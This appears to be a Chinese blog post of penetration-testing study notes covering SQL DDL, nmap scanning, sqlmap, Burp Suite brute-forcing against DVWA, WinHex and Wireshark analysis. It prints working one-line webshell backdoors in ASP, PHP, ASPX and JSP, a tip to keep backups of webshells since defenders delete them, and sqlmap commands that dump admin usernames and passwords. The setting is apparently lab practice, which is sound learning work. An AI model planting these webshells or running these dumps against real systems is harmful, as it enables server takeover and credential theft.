<p><strong>CREATE TABLE</strong>：用于创建新的数据库表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE table_name (</span><br><span class="line">    column1 data_type constraint,</span><br><span class="line">    column2 data_type constraint,</span><br><span class="line">    ...</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要创建的表名。</li>
<li><code>column1, column2, ...</code>: 表的列。</li>
<li><code>data_type</code>: 列的数据类型（如 <code>INT</code>、<code>VARCHAR</code> 等）。</li>
<li><code>constraint</code>: 列的约束（如 <code>PRIMARY KEY</code>、<code>NOT NULL</code> 等）。</li>
</ul>
<p><strong>ALTER TABLE</strong>：用于修改现有数据库表的结构。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ALTER TABLE table_name</span><br><span class="line">ADD column_name data_type</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要修改的表。</li>
<li><code>column_name</code>: 要添加的列。</li>
<li><code>data_type</code>: 列的数据类型。</li>
</ul>
<p>或：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ALTER TABLE table_name</span><br><span class="line">DROP COLUMN column_name</span><br></pre></td></tr></table></figure>
<ul>
<li><code>column_name</code>: 要删除的列。</li>
</ul>
<p><strong>DROP TABLE</strong>：用于删除数据库表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE table_name</span><br></pre></td></tr></table></figure>
<ul>
<li><code>table_name</code>: 要删除的表。</li>
</ul>
<h1>nmap</h1>
<blockquote>
<p>kali自带该功能</p>
<p><a target="_blank" rel="noopener" href="https://nmap.org/man/zh/index.html">Nmap参考指南(Man Page)</a></p>
</blockquote>
<p>Nmap，即Network Mapper，是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。</p>
<p><strong>其基本功能有三个：一是探测一组主机是否在线；其次扫描主机端口，嗅探所提供的网络服务；还可以推断主机所用的操作系统。</strong></p>
<p>使用<code>nmap --help</code>查看提供功能。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202222747293.png" class="" title="image-20241202222747293">
<h2 id="单目标-多目标-网段扫描">单目标/多目标/网段扫描</h2>
<img src="/2024/12/02/web-commontools-install/image-20241202232317440.png" class="" title="image-20241202232317440">
<ul>
<li>
<p><code>nmap -sP 172.16.5.156</code></p>
</li>
<li>
<p><code>nmap -sP 172.16.5.102 172.16.5.103</code></p>
</li>
<li>
<p><code>nmap -sP 172.16.5.*</code>/<code>nmap -sP 172.16.5.0/24</code></p>
</li>
<li>
<p>……x.x.x.x</p>
</li>
</ul>
<h2 id="端口扫描">端口扫描</h2>
<img src="/2024/12/02/web-commontools-install/image-20241202232245140.png" class="" title="image-20241202232245140">
<p><em>从0～65535，每个端口对应一个服务</em></p>
<p><em>0-1023一般被用作知名服务器到端口</em></p>
<ul>
<li>
<p>http：80</p>
</li>
<li>
<p>https：443</p>
</li>
<li>
<p>ftp：21</p>
</li>
<li>
<p>ssh：22</p>
</li>
<li>
<p>rdp：3389</p>
</li>
<li>
<p>mysql：3306</p>
</li>
<li>
<p>mssql：1433</p>
</li>
<li>
<p>oracle：1521</p>
</li>
</ul>
<p><em>通常情况下（未指定端口）nmap默认扫描最有可能开启的1000个端口</em></p>
<p><strong>端口状态：</strong></p>
<ul>
<li>
<p>nmap提供了6个端口状态：</p>
</li>
<li>
<p>open：端口开放</p>
</li>
<li>
<p>closed：端口关闭</p>
</li>
<li>
<p>filtered：端口被过滤（防火墙等）</p>
</li>
<li>
<p>unfiltered：nmap不能确认端口是否开放，但是未被过滤（ACK扫描才会出现这种情况，可以换种扫描方式）</p>
</li>
<li>
<p>open|filtered：开放或者过滤的，nmap不能确认（不是完全被过滤的状态）。</p>
</li>
<li>
<p>closed|filtered：nmap不能确认端口是关闭的还是被过滤的。</p>
</li>
</ul>
<h1>sqlmap</h1>
<blockquote>
<p>kali自带该功能</p>
<p><a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43819747/article/details/136736688">【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新_sqlmap使用教程-CSDN博客</a></p>
<p>可使用靶场：sqli-lab。</p>
</blockquote>
<p>SQLmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Acess，IBM DB2，SQLLite，Firebird，Sybase和SAP MaxDB……其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。</p>
<p>Sqlmap采用五种独特的SQL注入技术，分别是：</p>
<ul>
<li>
<p>基于布尔的盲注，即可以根据<strong>返回页面</strong>判断条件真假的注入。</p>
</li>
<li>
<p>基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。</p>
</li>
<li>
<p>基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。</p>
</li>
<li>
<p>联合查询注入，可以使用union的情况下的注入。</p>
</li>
<li>
<p>堆查询注入，可以同时执行多条语句的执行时的注入。</p>
</li>
</ul>
<h2 id="sqlmap基础注入">sqlmap基础注入</h2>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 判断有无注入</span><br><span class="line">sqlmap <span class="operator">-</span>u “http:<span class="operator">/</span><span class="operator">/</span><span class="number">172.16</span><span class="number">.5</span><span class="number">.156</span><span class="operator">/</span>?load<span class="operator">=</span>art<span class="operator">&amp;</span>act<span class="operator">=</span>detail<span class="operator">&amp;</span>id<span class="operator">=</span><span class="number">7</span>”</span><br><span class="line"># 注入数据库</span><br><span class="line">sqlmap <span class="operator">-</span>u “http:<span class="operator">/</span><span class="operator">/</span><span class="number">172.16</span><span class="number">.5</span><span class="number">.156</span><span class="operator">/</span>?load<span class="operator">=</span>art<span class="operator">&amp;</span>act<span class="operator">=</span>detail<span class="operator">&amp;</span>id<span class="operator">=</span><span class="number">7</span>” —dbs</span><br><span class="line"># 注入表</span><br><span class="line">sqlmap <span class="operator">-</span>u “http:<span class="operator">/</span><span class="operator">/</span><span class="number">172.16</span><span class="number">.5</span><span class="number">.156</span><span class="operator">/</span>?load<span class="operator">=</span>art<span class="operator">&amp;</span>act<span class="operator">=</span>detail<span class="operator">&amp;</span>id<span class="operator">=</span><span class="number">7</span>” <span class="operator">-</span>D cimer —tables</span><br><span class="line"># 注入字段</span><br><span class="line">sqlmap <span class="operator">-</span>u “http:<span class="operator">/</span><span class="operator">/</span><span class="number">172.16</span><span class="number">.5</span><span class="number">.156</span><span class="operator">/</span>?load<span class="operator">=</span>art<span class="operator">&amp;</span>act<span class="operator">=</span>detail<span class="operator">&amp;</span>id<span class="operator">=</span><span class="number">7</span>” <span class="operator">-</span>D cimer <span class="operator">-</span>T admin —columns</span><br><span class="line"># 注入内容</span><br><span class="line">sqlmap <span class="operator">-</span>u “http:<span class="operator">/</span><span class="operator">/</span><span class="number">172.16</span><span class="number">.5</span><span class="number">.156</span><span class="operator">/</span>?load<span class="operator">=</span>art<span class="operator">&amp;</span>act<span class="operator">=</span>detail<span class="operator">&amp;</span>id<span class="operator">=</span><span class="number">7</span>” <span class="operator">-</span>D cimer <span class="operator">-</span>T admin <span class="operator">-</span>C “username,password” —dump</span><br></pre></td></tr></table></figure>
<p>基于SQL注入从面到点的过程，抓取SQL注入的流量，分析重点：放在<strong>靠后位置去找到关键数据</strong>。</p>
<h1>webshell</h1>
<p>webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。</p>
<h2 id="一句话木马">一句话木马</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">asp一句话木马：</span><br><span class="line">&lt;%execute(request(&quot;value&quot;))%&gt;</span><br><span class="line"></span><br><span class="line">php一句话木马：</span><br><span class="line">&lt;?php eval($_POST[&#x27;pass&#x27;]);?&gt;</span><br><span class="line"></span><br><span class="line">aspx一句话木马：</span><br><span class="line">&lt;%@ Page Language=&quot;Jscript&quot;%&gt;</span><br><span class="line">&lt;%eval(Request.Item[&quot;value&quot;])%&gt;</span><br><span class="line"></span><br><span class="line">jsp一句话木马：</span><br><span class="line">＜%  </span><br><span class="line">f(request.getParameter(&quot;f&quot;)!=null)(new java.io.FileOutputStream(application.getRealPath(&quot;//&quot;)+request.getParameter(&quot;f&quot;))).write(request.getParameter(&quot;t&quot;).getBytes());  </span><br><span class="line">%＞</span><br></pre></td></tr></table></figure>
<p><em>Webshell要做好备份，因为经常会被电脑检测然后删掉</em></p>
<p><em>webshell就是以asp、php、jsp等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。</em></p>
<p><em>PHP、eval、post这几个部分组成的 “”里就是连接要用到的密码</em></p>
<h1>burp suite</h1>
<p>Burp Suite 是用于攻击web应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。</p>
<h2 id="Proxy">Proxy</h2>
<p>Proxy代理模块作为BurpSuite的核心功能，拦截HTTP/S的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。</p>
<p>Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过以恶意的方式修改浏览器的请求，Burp 代理可以用来进行攻击，如：SQL 注入，cookie 欺骗，提升权限，会话劫持，目录遍历，缓冲区溢出。拦截的传输可以被修改成原始文本，也可以是包含参数或者消息头的表格，也可以十六进制形式，甚至可以操纵二进制形式的数据。在 Burp 代理可以呈现出包含 HTML 或者图像数据的响应消息。</p>
<h3 id="intercept">intercept</h3>
<ul>
<li>
<p>intercept：用于显示和修改Http请求和相应，通过你的浏览器和web服务器之间拦截流量实现功能，在Proxy的选项中，可以配置拦截规则来确定是什么请求和相应被拦截（例如，范围内的项目，特定文件扩展名、项目要求与参数）</p>
</li>
<li>
<p>forword：将请求包发出</p>
</li>
<li>
<p>drop：丢掉请求包</p>
</li>
<li>
<p>intercept is on/off：截断的开关</p>
</li>
<li>
<p>Action：对请求包的一些操作，我们对包体的任何修改都可以在这个窗口内进行直接修改，然后发送</p>
</li>
<li>
<p>Raw：常规数据包模式</p>
</li>
<li>
<p>header：请求头</p>
</li>
<li>
<p>Hex：十六进制数据</p>
</li>
</ul>
<h3 id="http-history">http history</h3>
<p>模块里面是我们打开burpsuite代理以来所有的http请求，我们有时候验证漏洞成功了但是复现不成功这种场景都可以在这里面进行请求的回看。</p>
<h3 id="option">option</h3>
<p>在options选项我们可以设置请求的监听和拦截截断客户段的请求和服务端的返回以及websocket 请求的截断。在此处我们可以修改我们监听的ip和端口，有时候我们burpsuite的请求包截取不到可能就是因为此处有问题，端口冲突等等</p>
<h2 id="Intrude">Intrude</h2>
<ul>
<li>
<p>attack type：攻击模式设置</p>
</li>
<li>
<p>sniper：对变量依次进行破解。多个标记依次进行。</p>
</li>
<li>
<p>battering ram：对变量同时进行破解。多个标记同时进行。</p>
</li>
<li>
<p>pitchfork：每一个变量标记对应一个字典，取每个字典的对应项。</p>
</li>
<li>
<p>cluster bomb：对每个变量对应一个字典，并且进行交集，并且进行交叉爆破，尝试各种组合。</p>
</li>
</ul>
<p><strong>Payload：</strong></p>
<ul>
<li>
<p>Payload Sets Payload数量类型设置</p>
</li>
<li>
<p>Payload Opetions[Simple list]  该选项会根据选项1中Payload type的设置而改变</p>
</li>
<li>
<p>Payload Processing 对生成的Payload进行编码、加密、截取等操作</p>
</li>
<li>
<p>Payload Encoding 你可以配置哪些有效载荷中的字符应该是URL编码的HTTP请求中的安全传输。任何已配置的URL编码最后应用，任何有效载荷处理规则执行之后。</p>
</li>
</ul>
<h2 id="Repeater">Repeater</h2>
<p>重放数据包。</p>
<p>一般修改参数，然后重放数据包，查看返回结果。</p>
<h2 id="抓包示例">抓包示例</h2>
<blockquote>
<p>DVWA-brute force-low</p>
</blockquote>
<ul>
<li><code>Intercept On</code></li>
<li>foxy proxy选择对应模式</li>
</ul>
<img src="/2024/12/02/web-commontools-install/image-20241202233318301.png" class="" title="image-20241202233318301">
<p>右击，转到 intrude 板块，设置账号、密码为指定对象：（这里Cluster bomb 是 扫描1字典*2字典 次数，也就是username 和 password 的扫描完全独立。）</p>
<p>分别设置字典。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202233723759.png" class="" title="image-20241202233723759">
<p>进行暴力破解。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202233916212.png" class="" title="image-20241202233916212">
<p>登录成功的显示。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202234020235.png" class="" title="image-20241202234020235">
<p>也能直接抓包重放。</p>
<img src="/2024/12/02/web-commontools-install/image-20241202234221305.png" class="" title="image-20241202234221305">
<h1>Winhex查看文件</h1>
<table>
<thead>
<tr>
<th>常见文件</th>
<th>16进制格式</th>
<th>ASCII字符</th>
</tr>
</thead>
<tbody>
<tr>
<td>JPG</td>
<td>文件头：FFD8；文件尾：FFD9</td>
<td>jpg</td>
</tr>
<tr>
<td>PNG</td>
<td>文件头：89504E47；文件尾：AE426082</td>
<td>png</td>
</tr>
<tr>
<td>ZIP/DOCX/XLS</td>
<td>文件头：504B0304</td>
<td>pk</td>
</tr>
<tr>
<td>……</td>
<td>……</td>
<td>……</td>
</tr>
</tbody>
</table>
<ul>
<li>两个主界面
<ul>
<li>左：文件16进制格式</li>
<li>右：16进制转换成ASCII字符</li>
</ul>
</li>
<li>搜索去定位数据
<ul>
<li>16进制数值：往往提取可能存在的追加文件</li>
<li>字符串：存在<code>flag&#123;</code>或者一些关键字转码（编码）</li>
</ul>
</li>
</ul>
<h1>流量分析流程</h1>
<h2 id="三个界面">三个界面</h2>
<ul>
<li>
<p>分组列表：着色区域，提供关键数据显示，ip跟Info……</p>
</li>
<li>
<p>分组详情：基于协议进行报文拆分，按照从底层到顶层（相对来说，更关注靠近顶层的协议，TCP/UDP及以上的协议）</p>
</li>
<li>
<p>分组字节流：数据包的原始数据（数据量最全），作为<strong>查找区域</strong></p>
</li>
</ul>
<h2 id="总体分析"><strong>总体分析</strong></h2>
<ul>
<li>协议分级：筛选出关键协议
<ul>
<li>发现流量包中都是<strong>常见协议</strong>，我们主要关注相对靠上层<strong>占比相对更多</strong>的协议。</li>
<li>发现流量包中存在<strong>不常见协议</strong>，去关注<strong>占比相对更少</strong>的协议。</li>
</ul>
</li>
<li>会话：筛选出关键会话。
<ul>
<li>通过<strong>分组排序</strong>，把关键会话筛选出来。</li>
<li>相对来说看分组数量更多/更少的会话</li>
</ul>
</li>
<li>端点（<strong>网络攻击行为</strong>中相对较多）：筛选出某个关键IP，<strong>角色</strong>区分：服务器角色、普通用户、攻击者
<ul>
<li>数据量最多：服务器</li>
<li>数据量相对较多：攻击者</li>
<li>数据量较少：正常用户</li>
</ul>
</li>
</ul>
<h2 id="详细分析"><strong>详细分析</strong></h2>
<ul>
<li>
<p>基于<strong>已知流量</strong>进行过滤，在总体分析的基础之上进行查看</p>
</li>
<li>
<p>基于<strong>分析信息</strong>进行过滤，根据<strong>过滤语句</strong>进行过滤</p>
<ul>
<li>
<p>基于协议：ftp/http</p>
</li>
<li>
<p>基于ip：ip.addr/src/dst == xxx</p>
</li>
<li>
<p>通过报文类型进行筛选：<code>http.request.method == GET/POST</code>/<code>http.response.code == 200/404/302</code></p>
<ul>
<li>登录场景：302</li>
</ul>
</li>
</ul>
</li>
<li>
<p>追踪流</p>
<ul>
<li>版本较老的wireshark，直接推荐TCP追踪流</li>
<li>版本新的wireshark，优先TCP，但HTTP一般也能达成目的</li>
<li>HTTP在TCP基础之上，去除了部分信息。对需要提取的数据不太明确的情况下，推荐HTTP追踪流；相对明确文件数据，推荐更全的TCP追踪流。</li>
</ul>
</li>
</ul>
<h2 id="数据提取"><strong>数据提取</strong></h2>
<ul>
<li>
<p>字符串提取</p>
</li>
<li>
<p>文件提取</p>
</li>
<li>
<p>追踪流分析出来的信息进行提取</p>
</li>
<li>
<p>导出对象：HTTP/FTP</p>
</li>
</ul>

    </div>
    <!-- end of the post-->
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------THE <i class="fa-solid fa-cloud"></i> END-------------</div>
    
</div>
      
    </div>


    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Environment/" rel="tag"><i class="fa fa-tag"></i> Environment</a>
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/08/14/Python-xlsx-Study/" rel="prev" title="Python-Xlsx-Study">
                  <i class="fa fa-chevron-left"></i> Python-Xlsx-Study
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/12/05/kali-pip2%E5%AE%89%E8%A3%85/" rel="next" title="Kali-Pip2安装">
                  Kali-Pip2安装 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Eurynome</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>Symbols count total: </span>
    <span title="Symbols count total">317k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>Reading time total &asymp;</span>
    <span title="Reading time total">4:48</span>
  </span>
</div>
<!--
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>
-->

    </div>
  </footer>
  <!-- Background picture -->
    <script type="text/javascript" src="/js/canvas-nest.js"></script>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.5.0/pjax.min.js" integrity="sha256-3NkoLDrmHLTYj7csHIZSr0MHAFTXth7Ua/DDt4MRUAg=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script src="/js/pjax.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


<script src="https://unpkg.com/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: false,
  label: '🌓',
  autoMatchOsTheme: false
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
if (window.darkmode && !window.darkmode.isActivated()) {
  window.darkmode.toggle();
  var toggleButtons = document.getElementsByClassName("darkmode-toggle");
  if (toggleButtons && toggleButtons.length > 0) {
    for (i = 0; i < toggleButtons.length; i++) {
      toggleButtons[i].classList.add("darkmode-toggle--white");
    }
  }
}
</script>

</body>
</html>
